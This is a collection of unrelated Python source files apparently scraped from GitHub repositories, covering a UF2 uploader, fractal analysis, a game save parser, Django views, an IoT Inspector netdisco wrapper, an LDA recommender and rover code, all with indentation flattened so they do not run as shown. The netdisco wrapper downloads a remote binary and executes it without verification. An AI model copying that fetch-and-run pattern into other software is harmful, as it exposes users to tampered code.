if exists(drive.mountpoint + "INFO_UF2.TXT"):
with open(drive.mountpoint + 'INFO_UF2.TXT', "r") as f:
info = f.read()
uf2_device = uf2()
uf2_device.mountpoint = drive.mountpoint
uf2_device.info = info.partition('\n')[0]
uf2_device.model = re.search('(?:Model: )([^\r\n]+)', info).group(1)
uf2_device.board_id = re.search('(?:Board-ID: )([^\r\n]+)', info).group(1)
uf2_device.date = re.search('(?:Date: )([^\r\n]+)', info).group(1)
if(name == None or bool(re.search(name, uf2_device.model))):
uf2_devices.append(uf2_device)
else:
print("INFO_UF2.TXT does not exists")
return uf2_devices
uf2_devices = get_uf2_drives(args.d)
if(args.l):
print(f"{len(uf2_devices)} device(s) detected:")
for index, uf2_device in enumerate(uf2_devices):
print(f"Device #{index + 1}: {uf2_device.model} ({uf2_device.board_id})")
if(args.f):
file = args.f.replace("\'", "").replace("\"", "")
if exists(file) is False:
raise Exception("File does not exist!")
filename = file.split('\\')[-1]
if filename.endswith(".uf2") is False:
raise Exception("File is not an UF2 file!")
for index, uf2_device in enumerate(uf2_devices):
print(f"Uploading {filename} to device {uf2_device.model} ({uf2_device.board_id})...")
try: #UF2 disconnects after uploaded and copy will throw error
shutil.copy2(file, uf2_device.mountpoint)
except:
pass
print("Done Uploading\n")
if(args.r != True):
break
``` |
{
"source": "203lir/FractalProject",
"score": 3
} |
#### File: 203lir/FractalProject/module1.py
```python
import random
import math
import time
import numpy
from PIL import Image
start = time.time()
up = 400
down = 400
#center is the remaining probability
#generates random list of points
pointlist = []
x = 0
y = 32768
for i in range (0, 32768):
where = random.randint(0, 1000)
pointlist.append([x, y])
if where <= down:
y += 6
elif where <= (up+down):
y -= 6
x += 1
framesize = [32768, 65536]
#boxsize is distance from center to edges
def checkboxes(boxsize, pointlist):
#number of boxes which will be created in each direction
xboxnum = int(framesize[0]/(boxsize*2))
yboxnum = int(framesize[1]/(boxsize*2))
boxlist = []
#creates boxes
for i in range (xboxnum):
addtoboxlist = [2*i*boxsize+boxsize]
for j in range (yboxnum):
addtoboxlist.append([2*j*boxsize+boxsize, False])
boxlist.append(addtoboxlist)
#initializes previousx and previousy (purpose of these variables is in a later comment)
previousx = 0
previousy = int(yboxnum/2)
#looks through points, and checks to see if they are in a box
for a in pointlist:
for b in range ((previousx-2), (previousx+3)):
for c in range ((previousy-2), (previousy+3)):
#makes sure nothing weird is happening with b and c
                if b >= 0 and b < xboxnum:
if c >= 1 and c <= yboxnum:
x = boxlist[b][0]
y = boxlist[b][c][0]
#checks if point is in box
if a[0] >= (x-boxsize):
if a[0] <= (x+boxsize):
if a[1] >= (y-boxsize):
if a[1] <= (y+boxsize):
#marks the box the point is in as being "True"
boxlist[b][c][1] = True
break
else:
continue
break
#we know that the next point of the random walk will be near the current point, which means that we only have to check boxes relatively near the current point in order to have checked all boxes possible for the next point to be in; this significantly improves the speed of the program, instead of checking if the point is in every single box
previousx = b
previousy = c
#counts how many boxes there are points in, and returns a list of points to be highlighted
highlightedpointlist = []
counter = 0
for b in boxlist:
for c in b:
if isinstance(c, float):
pass
else:
if c[1] == True:
counter += 1
for i0 in range (int(b[0]-boxsize), int(b[0]+boxsize)):
for i1 in range (int(c[0]-boxsize), int(c[0]+boxsize)):
highlightedpointlist.append([i0, i1])
return [counter, highlightedpointlist]
#creates image
def createimage (pointlist, highlightedpointlist, name):
MyImg = Image.new('RGB', (1024, 2048), "white")
pixels = MyImg.load()
scaledpointlist = []
#cuts off most of the data, since otherwise the image would be huge and unusable
for n in pointlist:
if n[0] < 1024:
scaledpointlist.append([n[0], n[1]-31744])
    for b in highlightedpointlist:
if b[1] > 31744 and b[1] < 33792:
if b[0] < 1024:
pixels[b[0], b[1]-31744] = (250, 200, 21)
for a in scaledpointlist:
pixels[a[0], a[1]] = (0, 0, 0)
imagename = name + ".jpg"
MyImg.save(imagename, quality=95)
#delogged data to analyze
boxnumlist = []
for i in range (9, 13):
boxsize = 32768/(2**i)
#we take log base 2 of all the numbers, then do a linear regression, in order to find an exponential regression of the data as a whole
#this means that we can just use i as the x axis, instead of messing around with exponents and logs here
boxscale = i
numberofboxestouched = checkboxes(boxsize, pointlist)
createimage(pointlist, numberofboxestouched[1], str(i-9))
boxnumlist.append([boxscale, math.log2(numberofboxestouched[0])])
#linear regression on delogged data
#see Griswold's notes on linear regression
#this part of the code finds the SSR, and creates the first quadratic equation
linearTerm = 0
aCoefficient = 0
bCoefficient = 0
abCoefficient = 0
a2Coefficient = 0
b2Coefficient = 0
for i in boxnumlist:
x = i[0]
y = i[1]
linearTerm += y**2
aCoefficient += 2*(-x)*y
bCoefficient += 2*(-y)
abCoefficient += 2*x
a2Coefficient += x**2
b2Coefficient += 1
#solve with a variable, b constant
aCoefficient1 = 2*a2Coefficient
bCoefficient1 = abCoefficient
linearTerm1 = -aCoefficient
#solve with b variable, a constant
aCoefficient2 = abCoefficient
bCoefficient2 = 2*b2Coefficient
linearTerm2 = -bCoefficient
#solve system of equations
LCM = numpy.lcm(aCoefficient1, aCoefficient2)
aMultiplier1 = LCM/aCoefficient1
aMultiplier2 = LCM/aCoefficient2
newBCoefficient1 = bCoefficient1*aMultiplier1
newBCoefficient2 = bCoefficient2*aMultiplier2
newLinearTerm1 = linearTerm1*aMultiplier1
newLinearTerm2 = linearTerm2*aMultiplier2
newereBCoefficient = newBCoefficient1-newBCoefficient2
newerLinearTerm = newLinearTerm1-newLinearTerm2
b = newerLinearTerm/newereBCoefficient
extranewLinearTerm1 = bCoefficient1*b
extranewACoefficient = aCoefficient1
extranewLinearTerm2 = linearTerm1
a = (extranewLinearTerm2-extranewLinearTerm1)/extranewACoefficient
print("Fractal dimension: ", a)
print(boxnumlist)
print("Time taken: ", time.time()-start)
``` |
{
"source": "203Null/Gravity-Rush-2-Save-Loader",
"score": 3
} |
#### File: 203Null/Gravity-Rush-2-Save-Loader/GR2-Save-Loader.py
```python
import struct
import json
from collections import OrderedDict
file_path = "data0002.bin"
show_offset = True
show_hash = False
loaded_data = 0
def unpack(upstream_data_set):
global loaded_data
loaded_data = loaded_data + 1
currentCursor = file.tell()
print(hex(file.tell()))
file.seek(int.from_bytes(file.read(4), byteorder='little'), 0)
variable_name = file.read(200).split(b'\x00')[0].decode('UTF8') #Use UTF8 because some strings are in Japanese
print(hex(file.tell()))
print(variable_name)
file.seek(currentCursor + 4, 0)
type = int.from_bytes(file.read(4), byteorder='little')
data_location = file.tell()
if type == 0x08: # List
list_length = int.from_bytes(file.read(4), byteorder='little')
name_hash = file.read(4).hex()
data_location = file.tell()
value = {}
for i in range(0, list_length):
unpack(value)
value = OrderedDict(sorted(value.items()))
else:
if type % 0x10 == 0x0b: # String
string_length = int.from_bytes(file.read(4), byteorder='little') - 1
data_location = type // 0x10
file.seek(data_location, 0)
try:
value = file.read(string_length).decode('UTF8')
except:
value = "ERROR EXTRACTING STRING"
file.seek(currentCursor + 0x0c, 0)
elif type == 0x09: # Float
value = struct.unpack('f', file.read(4))[0]
elif type == 0x0C: # Boolean
value = int.from_bytes(file.read(1), byteorder='little') > 0
file.seek(3, 1)
else:
value = file.read(4).hex()
print("Warring!!! Unknow type!!! %s at %s with value %s" % (hex(type), hex(file.tell()-8), value))
print()
name_hash = file.read(4).hex()
if variable_name == None:
variable_name = hex(data_location)
else:
        if show_hash:
            variable_name = "%s %s" % (variable_name, name_hash)
        if show_offset:
            variable_name = "%s %s" % (variable_name, hex(data_location))
print(value)
upstream_data_set[variable_name] = value
file = open(file_path, mode='rb')
data = file.read()
data_set = OrderedDict()
if len(data) > 0x40 and data[0:4] == b'ggdL':
file.seek(0x0c, 0)
numOfData = int.from_bytes(file.read(4), byteorder='little')
while loaded_data < numOfData:
unpack(data_set)
print()
print(data_set)
print()
print("Complete with %i/%i data" % (loaded_data, numOfData))
with open(r"%s.txt" % (file_path.split('.')[0]), 'w', encoding='utf-8') as json_file:
json.dump(data_set, json_file, indent=4, ensure_ascii=False)
else:
print("File Incorrect")
``` |
{
"source": "203Null/kthread",
"score": 2
} |
#### File: 203Null/kthread/setup.py
```python
import setuptools
import setuptools.command.test
class NoseTestCommand(setuptools.command.test.test):
def finalize_options(self):
setuptools.command.test.test.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import nose
nose.run_exit(argv=["nosetests"])
with open("README.md", "r") as fd:
long_description = fd.read()
setuptools.setup(
name="kthread",
version="0.2.2",
author="<NAME>",
author_email="<EMAIL>",
description="Killable threads in Python!",
long_description=long_description,
long_description_content_type="text/markdown",
keywords="threading threads terminate",
url="https://github.com/munshigroup/kthread",
packages=setuptools.find_packages(exclude=["tests"]),
tests_require=["nose"],
classifiers=[
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 2.7",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
cmdclass={"test": NoseTestCommand},
)
``` |
{
"source": "2044smile/Djtube",
"score": 2
} |
#### File: posts/models/post.py
```python
from django.db import models
from users.models import User
class Post(models.Model):
user = models.ForeignKey(
User,
on_delete=models.CASCADE
)
video_id = models.CharField(
max_length=16,
)
video_original_title = models.CharField(
max_length=256,
blank=True,
null=True,
)
title = models.CharField(
max_length=256,
)
content = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def get_youtube_original_url(self):
return "https://www.youtube.com/watch?v={post_video_id}".format(
post_video_id=self.video_id
)
youtube_original_url = property(get_youtube_original_url)
def get_youtube_embed_url(self):
return "https://www.youtube.com/embed/{video_id}".format(
video_id=self.video_id,
)
    youtube_embed_url = property(get_youtube_embed_url)
def __str__(self):
return self.title
```
#### File: users/views/signup.py
```python
from django.conf import settings
from django.contrib import messages
from django.urls import reverse
from django.views.generic import View
from django.shortcuts import render, redirect
from django.contrib.auth import get_user_model
class SignupView(View):
def get(self, request, *args, **kwargs):
return render(
request,
'users/signup.html',
context={},
)
def post(self, request, *args, **kwargs):
username = request.POST.get('username')
password = request.POST.get('password')
phonenumber = request.POST.get('phonenumber')
# TODO - validations ( username )
user = get_user_model().objects.create_user(
username=username,
password=password,
phonenumber=phonenumber,
)
messages.add_message(
request,
messages.SUCCESS,
settings.SIGNUP_SUCCESS_MESSAGE
)
return redirect(reverse('users:login'))
``` |
{
"source": "2048-Bit/iot-inspector-client",
"score": 3
} |
#### File: iot-inspector-client/v2-src/netdisco.py
```python
import threading
import os
import stat
import utils
import requests
import subprocess
import json
import time
BASE_BINARY_PATH = 'https://github.com/noise-lab/netdisco-python-wrapper/raw/master/release/device_identifier_{os}' # noqa
DOWNLOAD_CHUNK_SIZE = 1024 * 1024
class NetdiscoWrapper(object):
def __init__(self, host_state):
self._host_state = host_state
self._os = utils.get_os()
self._netdisco_path = self._get_netdisco_path()
def start(self):
th = threading.Thread(target=self._start_thread)
th.daemon = True
th.start()
def _start_thread(self):
while True:
if len(self._host_state.get_ip_mac_dict_copy()) > 0:
utils.safe_run(self._run_netdisco)
time.sleep(10)
else:
time.sleep(1)
continue
def _get_netdisco_path(self):
exe_name = 'iot-inspector-netdisco'
return os.path.join(
os.path.expanduser('~'),
'princeton-iot-inspector',
exe_name)
def _download_netdisco_binary(self):
if os.path.isfile(self._netdisco_path):
return
# Download the binary
remote_binary_url = BASE_BINARY_PATH.format(os=self._os)
response = requests.get(remote_binary_url, stream=True)
with open(self._netdisco_path, 'wb') as fp:
for chunk in response.iter_content(chunk_size=DOWNLOAD_CHUNK_SIZE):
fp.write(chunk)
# Make sure the binary is executable
st = os.stat(self._netdisco_path)
os.chmod(self._netdisco_path, st.st_mode | stat.S_IXUSR)
def _run_netdisco(self):
self._download_netdisco_binary()
proc = subprocess.Popen(self._netdisco_path, stdout=subprocess.PIPE)
data = proc.communicate()[0]
for line in data.split('\n'):
self._parse_netdisco_output(line)
def _parse_netdisco_output(self, line):
try:
data = json.loads(line)
except ValueError:
return
if 'version' in data:
return
device_type = data['device']
for device_info in data['info']:
# Find IP
device_ip = device_info['host']
device_info['device_type'] = device_type
# Find MAC based on IP
try:
with self._host_state.lock:
device_mac = self._host_state.ip_mac_dict[device_ip]
except KeyError:
return
# Get device_id based on MAC
device_id = utils.get_device_id(device_mac, self._host_state)
            # Submit for upload later
with self._host_state.lock:
self._host_state.pending_netdisco_dict \
.setdefault(device_id, []).append(device_info)
def test():
n = NetdiscoWrapper(None)
n._download_netdisco_binary()
if __name__ == '__main__':
test()
``` |
{
"source": "204con/webcrawlingpc",
"score": 3
} |
#### File: 204con/webcrawlingpc/Driver.py
```python
import MemoryExpress as me
import Newegg as egg
import PCPartPicker as pcpp
import json
def printData(data):
for i in data:
print(i + ' ' + str(data[i]))
print()
search = input("Enter your desired product: ")
dataMemoryExpress = me.getDataMemoryExpress(search)
dataNewegg = egg.getDataNewegg(search)
dataPCPartPicker = pcpp.getDataPCPartPicker(search)
print('Your input, ' + search + ', returned the following results for the lowest prices: \n')
printData(dataMemoryExpress)
printData(dataNewegg)
printData(dataPCPartPicker)
with open('StorageMemoryExpress.json','w') as file:
json.dump(dataMemoryExpress, file, indent=4, sort_keys=True)
file.close()
with open('StorageNewegg.json','w') as file:
json.dump(dataNewegg, file, indent=4, sort_keys=True)
file.close()
with open('StoragePCPartPicker.json','w') as file:
json.dump(dataPCPartPicker, file, indent=4, sort_keys=True)
file.close()
``` |
{
"source": "2051289v/CardiacArtefactBeamformer",
"score": 3
} |
#### File: 2051289v/CardiacArtefactBeamformer/useful_snippets.py
```python
import numpy as np
# find the smallest difference between the closest events in 2 time series
def findMinDiff(arr,arr2):
minDiffs=[];
for x in arr:
minDiffs.append(min(abs(arr2-x)))
return minDiffs
def trimmean(arr, percent, axis):
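    # note: this gives a trimmed mean only if `arr` is already sorted along its
    # first axis; the slice below drops k+1 elements from the low end and k from
    # the high end.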
n = len(arr)
k = int(round(n*(float(percent)/100)/2))
return np.mean(arr[k+1:n-k], axis=axis)
def find_subset(vec,lowerbound,upperbound):
idx=np.arange(np.argmin(abs(vec-lowerbound)),np.argmin(abs(vec-upperbound))+1)
return idx
``` |
{
"source": "205Consulting/OpenSource",
"score": 3
} |
#### File: OpenSource/bipartite_lda/base_class.py
```python
import networkx as nx
from networkx.algorithms import bipartite
import gensim
import numpy as np
import time
import json
# todo:
# add hyperparameters i.e num_topics, iterations, w/e
'''
class: bpg_recommender
usage: write a new class (e.g. "soundcloud_recommender") that inherits bpg_recommender. Override additional_feature_factory
with whatever extra features are specific to your data. In the init of that new class, call "initialize"
with the user you want to recommend for (this returns the partition index that the user is in). Use the gather_data method
to gather data.
------ old:
Write a run method for your new class that
loops through self.nodes[partition_index^1], i.e. the other partition index, and use the gather_data module to gather data. Later,
in your new class, you can make a classifier that uses this data to predict.
'''
### README:
# Requirements: each node in bipartite graph must have str() method
# and that str() method must be unique. needed for gensim (i think).
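# A minimal usage sketch (illustrative only; the subclass name, the graph `b`,
# `user_node`, and the dump path below are hypothetical, not part of this module):
#
#   class soundcloud_recommender(bpg_recommender):
#       def additional_feature_factory(self, node):
#           return []  # add domain-specific features here
#
#   rec = soundcloud_recommender(b)
#   partition_index = rec.initialize_feature_mappings(user_node)
#   rec.gather_data('./ratings_', partition_index)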
class bpg_recommender(object):
# b: bipartite graph to run recommendations on
def __init__(self, b, num_clusters = 6):
self.b = b
self.num_clusters = num_clusters
self.nodes_sorted = None
# split the graph into it's two partitions
self.nodes = list(bipartite.sets(b))
self.mappings = []
        # NOTE: self.corpora[0] considers each node in self.nodes[0] and makes a bag-of-songs representation of its neighbors.
        # i.e. self.corpora[0] is what we pass into lda when we want to model the nodes in self.nodes[0] as documents and the nodes in self.nodes[1] as "words"
self.corpora, self.dicts = self._get_graph_corpora()
# lda_models[0] would be the lda model where the "documents" are sets of nodes in self.nodes[1]
self.lda_models = self._train_lda_models()
# per_cluster_node_distributions[0] is an array of dicts, each dict mapping id->probability for that cluster index
self.per_cluster_node_distributions = self._find_per_cluster_node_distributions()
self.per_dnode_cluster_distributions = self._find_per_dnode_cluster_distributions()
    def print_node(self, node):
'''
function: print_node
params: node - node to print
notes: users should overwrite this function.
'''
print node
def additional_feature_factory(self, node):
'''
function: additional_feature_factory
params: node - node to get features for
returns: python list of additional features
notes: see feature_factory. users should overrwrite this function.
'''
return []
def feature_factory(self, node):
'''
function: feature_factory
params: node - node to get features for
returns: python list of features for the node
        notes: users that inherit bpg_recommender should override "additional_feature_factory" with
               any specific features they have, and then call feature_factory on their nodes
'''
features = []
# append all the base features that we have
for mapping in self.mappings:
features.append(mapping[node])
# append additional, non-agnostic features
features += self.additional_feature_factory(node)
return features
def _find_per_dnode_cluster_distributions(self):
return [self._find_per_dnode_cluster_distribution(0),self._find_per_dnode_cluster_distribution(1)]
def _find_per_dnode_cluster_distribution(self, partition_index):
return None
#todo: not clear if this is something I should pre-compute.. not too hard to get from
# gensim using .inference (as in the code currently)
def _find_per_cluster_node_distributions(self):
return [self._find_per_cluster_node_distribution(0), self._find_per_cluster_node_distribution(1)]
def _find_per_cluster_node_distribution(self, partition_index):
'''
function: _find_per_cluster_node_distribution
params: partition_index - which lda model we're looking at
returns: an num-clusters length array, the ith element a dict representing the ith cluster. that dict
has nodes as keys and probability that that cluster generates that node as values.
notes: this function is essentially because gensim makes it wierd to find these values using their
data structures
'''
dist = []
# iterate through topics
for cluster in range(self.num_clusters):
cluster_dist_dict = {}
# get probability distribution
cluster_dist = self.lda_models[partition_index].state.get_lambda()[cluster]
# normalize to real probability distribution
cluster_dist = cluster_dist / cluster_dist.sum()
for i in range(len(cluster_dist)):
# map the string id of the node to the probability (self.dict goes from gensim's id -> my string id)
cluster_dist_dict[self.dicts[partition_index][i]] = cluster_dist[i]
# append to array of dicts
dist.append(cluster_dist_dict)
return dist
def _get_partition_corpus(self,partition):
'''
function: _get_partition_corpus
params: partition - which partition to get the corpus for
returns: corpus - gensim corpus, each document being the neighbors of a node in our partition
dictionary - gensim dictionary for the above corpus
'''
# build bags of neighbors
bags_of_neighbors = []
for node in partition:
bags_of_neighbors.append(self._node_to_bagofneighbors(node))
# create gensim dictionary
dictionary = gensim.corpora.Dictionary(bags_of_neighbors)
        # convert to gensim's bag-of-words format
corpus = [dictionary.doc2bow(bon) for bon in bags_of_neighbors]
return corpus, dictionary
def _get_graph_corpora(self):
# left nodes:
zero_corpus, zero_dict = self._get_partition_corpus(self.nodes[0])
# right nodes:
one_corpus, one_dict = self._get_partition_corpus(self.nodes[1])
return [zero_corpus, one_corpus], [zero_dict, one_dict]
def _train_lda_models(self):
return [self._train_lda_model(0), self._train_lda_model(1)]
def _train_lda_model(self, partition_index):
        lda = gensim.models.ldamodel.LdaModel(corpus=self.corpora[partition_index], id2word=self.dicts[partition_index], num_topics=self.num_clusters)
return lda
# self.lda_models[partition_index] = lda
def _check_lda_model(self, partition_index):
if self.lda_models[partition_index] == None:
self._train_lda_model(partition_index)
else:
return
def _node_to_bagofneighbors(self,node):
# currently returns the string of the id's for the neighbors. ***TODO: make __str__ method
return [str(neighbor) for neighbor in self.b.neighbors(node)]
def backwards_LDA_psu(self, node):
'''
function: backwards_LDA_psu
params: node - the node we are recommending for (not the node we want the backwards LDA psu for)
returns: scores - a dict mapping nodes to their backwards LDA psu scores
notes: we want to find argmax_s P(s|u), where u=user s=song. by bayes, argmax_s P(s|u) = argmax_s P(u|s)P(s), the denominator P(u)
being cancelled away. we can find P(u|s) by treating the songs as "generating" users (something like backwards LDA). The generative
story there would be that when a song "generates" a user, i.e when a song is good enough that a user likes it, the way that happens is
first the song appeals to some group, and then the song appeals to some person in that group. P(s) can be treated as uniform to
make recommendations not care about the popularity of the song; else, P(s) could either be estimated by something like playback count,
or could be found from the graph by degree.
'''
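        # Scoring sketch implemented below: for each candidate s we compute
        #     P(u|s) = sum over clusters t of P(t|s) * P(u|t)
        # where P(t|s) is normalized_gamma from lda.inference on s's neighbor
        # "document", P(u|t) comes from per_cluster_node_distributions, and
        # P(s) is effectively treated as uniform.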
# backwards LDA so we take the other partition index (^1); note that "node" is NOT in nodes[partition_index]
partition_index = (self._find_partition_index(node)^1)
#just more or less an assertion, should have been trained in init (was needed for old code)
self._check_lda_model(partition_index)
scores = {}
to_sort = []
for node_to_check in self.nodes[partition_index]:
# find P(t|s) as 'gamma'
bag_rep = self._node_to_bagofneighbors(node_to_check)
gensim_bow = self.dicts[partition_index].doc2bow(bag_rep)
gamma, sstats = self.lda_models[partition_index].inference([gensim_bow])
normalized_gamma = gamma[0]/sum(gamma[0])
# score is sum over t (P(t|s)P(u|t)) = P(u|s) by independence assumptions of LDA. P(t|s) = normalized_gamma[dist_index], P(u|t) = per_cluster_node_dist[part_index][dist_index][str(node)].
# # sum over t:
# score = 0
# for cluster_index in range(len(self.per_cluster_node_distributions[partition_index])):
# #P(t|s):
# p_t_given_s = normalized_gamma[cluster_index]
# # P(u|t):
# p_u_given_t = self.per_cluster_node_distributions[partition_index][cluster_index][str(node)]
# # add to score
# score += p_t_given_s * p_u_given_t
# ____ NOTE: BECAUSE OF 1-NEIGHBOR NODES IN THE GRAPH, NEED TO INCLUDE P(S) PROBABLY ____ ##
score = sum([self.per_cluster_node_distributions[partition_index][dist_index][str(node)]*normalized_gamma[dist_index] for dist_index in range(len(self.per_cluster_node_distributions[partition_index]))]) #
scores[node_to_check] = score
to_sort.append((node_to_check, score))
# sort on highest scores
to_sort.sort(key=lambda x: x[1], reverse=True)
nodes_sorted = [x[0] for x in to_sort]
return scores, nodes_sorted
def _find_partition_index(self, node):
'''
function: _find_partition_index
params: node - node to look for
returns: partition_index: which partition 'node' is in
'''
if node in self.nodes[0]:
partition_index = 0
elif node in self.nodes[1]:
partition_index = 1
else:
raise nx.NetworkXException('The node you are trying to recommend for does not exist in the graph')
return partition_index
def forwards_LDA_psu(self, node):
'''
function: forwards_LDA_psu
params: node - node we are recommending for (not the node we are looking for the score for)
returns: scores - dict mapping nodes to their forwards LDA psu scores
scores_cosine_sim - dict mapping nodes to the cosine similarity between that node's cluster distribution and the original "node"'s cluster distribution
notes: again we look for argmax_s P(s|u), but now we model it more directly by running LDA treating users as generating songs. Then argmax
P(s|u) is simply the most likely song to be generated, which is easily findable by P(t|u)P(s|t). It is unclear to me what the
relationship between recommendation feature #1 and #2 is... should be somewhat similar. Note that we could be more efficient by sampling
for example, rather than iterating and picking the best song (sampling like just going and DOING lda's generative story)
for cosine similarity, we simply find the cluster distribution for our node by running inference on our node's "document" (it's neighbors).
Then, we find the cluster distribution of an arbitrary other node (which is in the other bipartite set) by running inference on
a document consisting only of that node itself. Finally we take the cosine similarity. Note that the inference on a single-word
document SHOULD be equivalent to iterating through the cluster node distributions and taking that node's probability from each -- not sure which
is faster.
'''
partition_index = self._find_partition_index(node)
# check to see that the lda model has been trained
self._check_lda_model(partition_index)
# get distribution for our node
normalized_gamma = self._find_forwards_node_cluster_distribution(node, partition_index)
# bag_rep = self._node_to_bagofneighbors(node)
# gensim_bow = self.dicts[partition_index].doc2bow(bag_rep)
# gamma, sstats = self.lda_models[partition_index].inference([gensim_bow])
# normalized_gamma= gamma[0]/sum(gamma[0])
scores = {}
scores_cosine_sim = {}
for node_to_check in self.nodes[partition_index^1]:
# cosine similarity:
# run inference on just the song to find the song's cluster distribution
new_bag_rep = [str(node_to_check)]
nnormalized_gamma = self._bag_rep_to_gamma(new_bag_rep, partition_index)
# new_gensim_bow = self.dicts[partition_index].doc2bow(bag_rep)
# ngamma, nsstats = self.lda_models[partition_index].inference([gensim_bow])
# nnormalized_gamma = ngamma[0]/sum(ngamma[0])
# take cosine similarity
scores_cosine_sim[node_to_check] = cosine_similarity(nnormalized_gamma, normalized_gamma)
#probability of generation:
#score = P(s|u) = sum over t (P(t|u)P(s|t)). P(t|u) = normalized_gamma[dist_index], P(s|t) = per_cluster_node_dist[part_index][dist_index][str(node_to_check)]
score = sum([self.per_cluster_node_distributions[partition_index][dist_index][str(node_to_check)]*normalized_gamma[dist_index] for dist_index in range(len(self.per_cluster_node_distributions[partition_index]))])
scores[node_to_check] = score
return scores, scores_cosine_sim
def _find_backwards_node_cluster_distribution(self, node, partition_index):
return [distribution[str(node)] for distribution in self.per_cluster_node_distributions[partition_index]]
def _find_backwards_similarity(self,node, other_node, partition_index):
'''
function: _find_backwards_similarity
params: node - node we are recommending for
other_node - node we want to find similarity to
partition_index - which partition both nodes are in
returns: cosine similarity between the two nodes (they are in the same partition)
notes: backwards similarity uses LDA that treats songs as generating users; each user has a distribution over topics that it is in,
and backwards similarity is the cosine similarity of that topic distribution vector. Cosine similarity means that users
who are similar but don't "like" as many songs are still considered similar
'''
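        # Cosine similarity ignores vector magnitude: e.g. cosine_similarity([1, 2, 3], [2, 4, 6])
        # is 1 (up to floating point), so a user with fewer "likes" can still match closely.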
# other partition index because we're doing backwards LDA
partition_index = partition_index^1
# check to see that the lda model has been trained
self._check_lda_model(partition_index)
#get the cluster distribution of our node
node_cluster_distribution = self._find_backwards_node_cluster_distribution(node, partition_index)
#get the cluster distribution of the other node
other_node_cluster_distribution = self._find_backwards_node_cluster_distribution(other_node, partition_index)
#return cosine similarity
return cosine_similarity(node_cluster_distribution, other_node_cluster_distribution)
def _bag_rep_to_gamma(self, bag_rep, partition_index):
gensim_bow = self.dicts[partition_index].doc2bow(bag_rep)
gamma, sstats = self.lda_models[partition_index].inference([gensim_bow])
normalized_gamma= gamma[0]/sum(gamma[0])
return normalized_gamma
def _find_forwards_node_cluster_distribution(self, node, partition_index):
bag_rep = self._node_to_bagofneighbors(node)
return self._bag_rep_to_gamma(bag_rep, partition_index)
# gensim_bow = self.dicts[partition_index].doc2bow(bag_rep)
# gamma, sstats = self.lda_models[partition_index].inference([gensim_bow])
# normalized_gamma= gamma[0]/sum(gamma[0])
# return normalized_gamma
def _find_forwards_similarity(self,node, other_node, partition_index):
'''
function: _find_forwards_similarity
params: node - node we are recommending for
other_node - node we want to find similarity to
partition_index - which partition both nodes are in
returns: cosine similarity between the two nodes (they are in the same partition)
notes: forwards similarity models users generating songs. Each user has a per-user cluster distribution.
we take cosine similarity of these distributions.
'''
#check to see that lda model has been trained
self._check_lda_model(partition_index)
#get the cluster distribution of our node
node_cluster_distribution = self._find_forwards_node_cluster_distribution(node, partition_index)
#get the cluster distribution of the other node
other_node_cluster_distribution = self._find_forwards_node_cluster_distribution(other_node, partition_index)
#return cosine similarity
return cosine_similarity(node_cluster_distribution, other_node_cluster_distribution)
def find_most_similar_user(self,node):
partition_index = self._find_partition_index(node)
backwards_sim = {}
forwards_sim = {}
# iterate through other nodes on node's side of the bipartite graph
for other_node in self.nodes[partition_index]:
backwards_similarity = self._find_backwards_similarity(node, other_node, partition_index)
forwards_similarity = self._find_forwards_similarity(node, other_node, partition_index)
# dicts for testing purposes, to see relationships
backwards_sim[other_node] = backwards_similarity
forwards_sim[other_node] = forwards_similarity
return backwards_sim, forwards_sim
def initialize_feature_mappings(self, node):
partition_index = self._find_partition_index(node)
backwards_psu, nodes_sorted = self.backwards_LDA_psu(node)
forwards_psu, forwards_cosine_sim = self.forwards_LDA_psu(node)
backwards_sim, forwards_sim = self.find_most_similar_user(node)
self.mappings += [backwards_psu, forwards_psu, forwards_cosine_sim]
self.nodes_sorted = nodes_sorted
# self.mappings['backwards_psu'] = backwards_psu
# self.mappings['fowards_psu'] = forwards_psu
# self.mappings['forwards_cosine_sim'] = forwards_cosine_sim
return partition_index
def gather_data(self, dump_file_path, partition_index):
'''
function: gather_data
params: dump_file_path - path to dump the outputted json file into
partition_index - partition to loop through
returns: the data that is json'd at the end
notes: usage is to loop through all the nodes and ask the user for a rating of it. on ending the loop,
the data is json'd into dump_file_path
'''
ratings = []
try:
# loop through nodes
for node in self.nodes_sorted:
# for node in self.nodes[partition_index]:
print "Here's the next data element:"
self.print_node(node)
print "\n\n"
features = self.feature_factory(node)
# get rating
rating = raw_input("Rating? (must be an int) ---> ")
sure = raw_input("Are you sure? (y/n) ---> ")
while (sure != "y"):
rating = raw_input("Rating? ---> ")
sure = raw_input("Are you sure? (y/n) ---> ")
ratings.append(features + [int(rating)])
except KeyboardInterrupt:
print "Shutting down. Do not press anything."
# dump json
            json.dump(ratings, open(dump_file_path + str(time.time()) + '.json', 'w'))
return ratings
return ratings
# ======= [ UTILS ] ========= #
def cosine_similarity(u, v):
return np.dot(u,v) / (np.sqrt(np.dot(u,u)) * np.sqrt(np.dot(v,v)))
```
#### File: OpenSource/pd_to_lda/utils.py
```python
from functools import partial
from pd_lda import pd_lda
import pandas as pd
df = pd.read_pickle('calendar_events_old.df')
df_one = df[:len(df)-20]
df_two = df[len(df)-20:len(df)]
pdlda = pd_lda()
model = pdlda.update_lda(df_one, ['name'])
print model.show_topic(1)
# mymodel = model.copy()
new_model = pdlda.update_lda(df_two, ['name'])
print new_model.show_topic(1)
new_df = pdlda.add_lda_column(df, ['name'], new_model)
class mytest(object):
def __init__(self):
self.x = 33
def realtest(self, index):
return index + self.x
def tester(self):
x = map(self.realtest, range(10))
print x
def func1(self, y, z):
print "first: " + str(y)
print "second: " + str(z)
def test(self):
new = partial(self.func1, 2)
new(3)
``` |
{
"source": "2062GlossyLedge/Rover-projects",
"score": 3
} |
#### File: Rover-projects/autonomous rover #1/HC-SR04+servo.py
```python
from gpiozero import AngularServo
from gpiozero import DistanceSensor
from time import sleep
s = AngularServo(18, min_angle=-90, max_angle=90)
#Ultrasonic sensor reads distance for the whole program
sensor = DistanceSensor(echo=27, trigger=17)
s.mid()
obstacle = 10
object_distance = sensor.distance * 100
print(object_distance)
#move forward from rest
def when_object_in_front():
    while True:
        # refresh the reading each pass so the loop reacts to new measurements
        object_distance = sensor.distance * 100
        if object_distance <= obstacle:
s.max()
sleep(4)
#reverse, turn left, move forward
continue
#a1 will only look for obstacles by turning left
#if object_distance <= obstacle:
#s.min()
#sleep(4)
#reverse
#continue
